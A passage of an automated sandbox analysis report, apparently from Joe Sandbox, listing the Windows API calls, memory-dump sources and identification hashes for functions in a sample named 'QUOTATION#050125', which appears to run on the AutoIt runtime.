                                                                                      • Instruction Fuzzy Hash: 7251D531500314BACF18AF65D895BA9B3A5EF55314F24847FF806DF292DB708C85CBA6
                                                                                      Function 000D920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                      • BeginPaint.USER32(?,?,?), ref: 000D9241
                                                                                      • GetWindowRect.USER32(?,?), ref: 000D92A5
                                                                                      • ScreenToClient.USER32(?,?), ref: 000D92C2
                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000D92D3
                                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 000D9321
                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001171EA
                                                                                        • Part of subcall function 000D9339: BeginPath.GDI32(00000000), ref: 000D9357
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                      • String ID:
                                                                                      • API String ID: 3050599898-0
                                                                                      • Opcode ID: c0dde96bb26a5ab6da80b49bb6d34a42260cc9956b43bde0c08b2060d6a9af77
                                                                                      • Instruction ID: fe58bf18ef468a28c720816b4975a0ba12778f7b0172ea05f48cfa81f726611f
                                                                                      • Opcode Fuzzy Hash: c0dde96bb26a5ab6da80b49bb6d34a42260cc9956b43bde0c08b2060d6a9af77
                                                                                      • Instruction Fuzzy Hash: 75419A70108301EFD721DF24CC84FBA7BB8EB59725F14062AF9A59B2E2C7319985DB61
                                                                                      Function 001307EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0013080C
                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00130847
                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00130863
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 001308DC
                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001308F3
                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00130921
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                      • String ID:
                                                                                      • API String ID: 3368777196-0
                                                                                      • Opcode ID: f9696f027b77824f41cdf20a0ef6920648bed7083f420efffd5b00e1f58b5089
                                                                                      • Instruction ID: 9b8bf10acc6a2c636bea4ccf6c89fe996cad8873df4d5f84b07060516f36b075
                                                                                      • Opcode Fuzzy Hash: f9696f027b77824f41cdf20a0ef6920648bed7083f420efffd5b00e1f58b5089
                                                                                      • Instruction Fuzzy Hash: 59415871900305EFDF159F54DC85AAA77B8FF08300F1480A5E905AA29BDB70DEA0DBA0
                                                                                      Function 001581DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0011F3AB,00000000,?,?,00000000,?,0011682C,00000004,00000000,00000000), ref: 0015824C
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00158272
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 001582D1
                                                                                      • ShowWindow.USER32(00000000,00000004), ref: 001582E5
                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 0015830B
                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0015832F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 642888154-0
                                                                                      • Opcode ID: 6f9441cb30a9e3c2db0e3ba51e875167f790f32ca589b125dd6ea5847cdf9bc6
                                                                                      • Instruction ID: 978aa05f20b3c989f60731ed994b4721ac9b9a1b68464a62cccaf19999193766
                                                                                      • Opcode Fuzzy Hash: 6f9441cb30a9e3c2db0e3ba51e875167f790f32ca589b125dd6ea5847cdf9bc6
                                                                                      • Instruction Fuzzy Hash: 2A41B430601745EFDF12DF15C899BE47BF1FB0A716F184169E9289F662CB31A889CB50
                                                                                      Function 0012175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00120FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00120FCA
                                                                                        • Part of subcall function 00120FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00120FD6
                                                                                        • Part of subcall function 00120FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00120FE5
                                                                                        • Part of subcall function 00120FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00120FEC
                                                                                        • Part of subcall function 00120FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00121002
                                                                                      • GetLengthSid.ADVAPI32(?,00000000,00121335), ref: 001217AE
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001217BA
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 001217C1
                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 001217DA
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00121335), ref: 001217EE
                                                                                      • HeapFree.KERNEL32(00000000), ref: 001217F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                      • String ID:
                                                                                      • API String ID: 3008561057-0
                                                                                      • Opcode ID: c04f5c9b13312f08b4d3a402fbbac83fe7326c350e97db0d274652ca4fabc9cc
                                                                                      • Instruction ID: 0c5800aaaefb06f968b2cb46d916b8a7412ab1525de1c3831444a0ea47b257d5
                                                                                      • Opcode Fuzzy Hash: c04f5c9b13312f08b4d3a402fbbac83fe7326c350e97db0d274652ca4fabc9cc
                                                                                      • Instruction Fuzzy Hash: 8611BE32500715FFDB10DFA4EC89BAF7BA9EB95356F104018F4419B211D735A990CBA0
                                                                                      Function 001214CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001214FF
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00121506
                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00121515
                                                                                      • CloseHandle.KERNEL32(00000004), ref: 00121520
                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0012154F
                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00121563
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                      • String ID:
                                                                                      • API String ID: 1413079979-0
                                                                                      • Opcode ID: 5f6227ca41c7a357fd9a5bced16900bdc6ac5e9e21e80d740f867c981fedea63
                                                                                      • Instruction ID: cb742495d1963dfb0d85c21db20141a912d1e92036ecb8521de50a4011a17f11
                                                                                      • Opcode Fuzzy Hash: 5f6227ca41c7a357fd9a5bced16900bdc6ac5e9e21e80d740f867c981fedea63
                                                                                      • Instruction Fuzzy Hash: EA11447250024DFFDB11CFA8ED49BDA7BA9EB48705F044064FA05A60A0C3718EA0DBA0
                                                                                      Function 00158A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000D9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000D9693
                                                                                        • Part of subcall function 000D9639: SelectObject.GDI32(?,00000000), ref: 000D96A2
                                                                                        • Part of subcall function 000D9639: BeginPath.GDI32(?), ref: 000D96B9
                                                                                        • Part of subcall function 000D9639: SelectObject.GDI32(?,00000000), ref: 000D96E2
                                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00158A4E
                                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00158A62
                                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00158A70
                                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00158A80
                                                                                      • EndPath.GDI32(?), ref: 00158A90
                                                                                      • StrokePath.GDI32(?), ref: 00158AA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                      • String ID:
                                                                                      • API String ID: 43455801-0
                                                                                      • Opcode ID: 0a436127f96b2605cd492b6ea63efb7475c20d536123c269ef515d3d8348eb01
                                                                                      • Instruction ID: 00fc4ea27f3dd2740896ec9ff000e6c8f6033f9ecdf4bc16844f7ba07392d7fb
                                                                                      • Opcode Fuzzy Hash: 0a436127f96b2605cd492b6ea63efb7475c20d536123c269ef515d3d8348eb01
                                                                                      • Instruction Fuzzy Hash: 4B11DB7600024DFFDF129F94DC88EAA7F6DEB08395F048012BA199A5A1C7729D95DFA0
                                                                                      Function 001251FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDC.USER32(00000000), ref: 00125218
                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00125229
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00125230
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00125238
                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0012524F
                                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00125261
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDevice$Release
                                                                                      • String ID:
                                                                                      • API String ID: 1035833867-0
                                                                                      • Opcode ID: 0e3d60ab88a7e83b1d90d89dae25d6986ba8201ffe02f3d95925257107060d25
                                                                                      • Instruction ID: 50f7f041a162a1b02f2db3579a4a5a281bcd9e85fdfde33cb3c28032558eb89b
                                                                                      • Opcode Fuzzy Hash: 0e3d60ab88a7e83b1d90d89dae25d6986ba8201ffe02f3d95925257107060d25
                                                                                      • Instruction Fuzzy Hash: 7C018F75A00718FFEB109FA59C49A4EBFB8EB48752F044065FA04AB281D6709900CBA0
                                                                                      Function 000C1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 000C1BF4
                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 000C1BFC
                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000C1C07
                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000C1C12
                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 000C1C1A
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 000C1C22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual
                                                                                      • String ID:
                                                                                      • API String ID: 4278518827-0
                                                                                      • Opcode ID: 8899023dfc6eaa812f40f6bc09d7b9cbb1a888a27505193debebbfaaf8cbc333
                                                                                      • Instruction ID: 24a0b788c56c8f607e7fe5927ad736ab38ce076df7499988714f3e419d6a958d
                                                                                      • Opcode Fuzzy Hash: 8899023dfc6eaa812f40f6bc09d7b9cbb1a888a27505193debebbfaaf8cbc333
                                                                                      • Instruction Fuzzy Hash: C1016CB0902759BDE3008F5A8C85B52FFA8FF19354F00411B915C4BA41C7F5A864CBE5
                                                                                      Function 0012EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0012EB30
                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0012EB46
                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0012EB55
                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0012EB64
                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0012EB6E
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0012EB75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                      • String ID:
                                                                                      • API String ID: 839392675-0
                                                                                      • Opcode ID: 939b7ab0e6cbf075eba6949563a99f8706e189720721c2195e6bf9c0ca4d04fb
                                                                                      • Instruction ID: a4de9333d34ae4e3cf74faf7a81af609adaad912c65964c5bf23abb522290253
                                                                                      • Opcode Fuzzy Hash: 939b7ab0e6cbf075eba6949563a99f8706e189720721c2195e6bf9c0ca4d04fb
                                                                                      • Instruction Fuzzy Hash: 0BF01772240758FFE6215B629C0EEEB3A7CEBCAB12F000158F601D9591A7A05A818AF5
                                                                                      Function 00117439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?), ref: 00117452
                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00117469
                                                                                      • GetWindowDC.USER32(?), ref: 00117475
                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00117484
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00117496
                                                                                      • GetSysColor.USER32(00000005), ref: 001174B0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                      • String ID:
                                                                                      • API String ID: 272304278-0
                                                                                      • Opcode ID: 5d39f3a99d55e5a3c6ec3837a32640e4e9e2f99a41f5c0d112b079de120a3476
                                                                                      • Instruction ID: 2e66e3ffda473d64fcd95e5628be9af3fe26f58d6b972957a901cd93f3a7c0c2
                                                                                      • Opcode Fuzzy Hash: 5d39f3a99d55e5a3c6ec3837a32640e4e9e2f99a41f5c0d112b079de120a3476
                                                                                      • Instruction Fuzzy Hash: 4C014B31500315FFEB515FA4DC48BEABBB6FB04322F510164F916A7AA1CB311E91EB90
                                                                                      Function 00121874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0012187F
                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 0012188B
                                                                                      • CloseHandle.KERNEL32(?), ref: 00121894
                                                                                      • CloseHandle.KERNEL32(?), ref: 0012189C
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 001218A5
                                                                                      • HeapFree.KERNEL32(00000000), ref: 001218AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                      • String ID:
                                                                                      • API String ID: 146765662-0
                                                                                      • Opcode ID: 5d9e38e811384c4ddc0bc9332aaac19e9c45f74fcf74aa6c2fe3ab5aa437985d
                                                                                      • Instruction ID: bc5fb2245f94799f2bddfb0cb5e538be1959224f7a1db5e28e55a6d2d2e6ffe0
                                                                                      • Opcode Fuzzy Hash: 5d9e38e811384c4ddc0bc9332aaac19e9c45f74fcf74aa6c2fe3ab5aa437985d
                                                                                      • Instruction Fuzzy Hash: 90E05276104705FFDA015FA5ED0C94ABB69FB49B22B508625F22689871CB32A4A1DB90
                                                                                      Function 00143947 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 240COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 0014396B
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00143A7A
                                                                                      • VariantClear.OLEAUT32(?), ref: 00143C1F
                                                                                        • Part of subcall function 00130CDF: VariantInit.OLEAUT32(00000000), ref: 00130D1F
                                                                                        • Part of subcall function 00130CDF: VariantCopy.OLEAUT32(?,?), ref: 00130D28
                                                                                        • Part of subcall function 00130CDF: VariantClear.OLEAUT32(?), ref: 00130D34
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                      • API String ID: 4237274167-1221869570
                                                                                      • Opcode ID: f456af0aee705fa2ae2d3a8dc1c60f39ab01473b57605f02f0a913f6329570ea
                                                                                      • Instruction ID: a5eeabbf296c99287b7b7f102e4a67b3c506a2c4bbbdad69c5b7c0342d22ff80
                                                                                      • Opcode Fuzzy Hash: f456af0aee705fa2ae2d3a8dc1c60f39ab01473b57605f02f0a913f6329570ea
                                                                                      • Instruction Fuzzy Hash: C59149756083059FC704EF24C48596AB7E5FF89314F14892EF89A9B362DB30EE45CB92
                                                                                      Function 00144BAD Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0012000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?,?,?,0012035E), ref: 0012002B
                                                                                        • Part of subcall function 0012000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?,?), ref: 00120046
                                                                                        • Part of subcall function 0012000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?,?), ref: 00120054
                                                                                        • Part of subcall function 0012000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?), ref: 00120064
                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00144C51
                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00144DCF
                                                                                      • CoTaskMemFree.OLE32(?), ref: 00144DDA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecuritylstrcmpi
                                                                                      • String ID: NULL Pointer assignment
                                                                                      • API String ID: 4175897753-2785691316
                                                                                      • Opcode ID: 124258f990786b5006f0789320414b35a9d1bd627235b333dd6d02f767384380
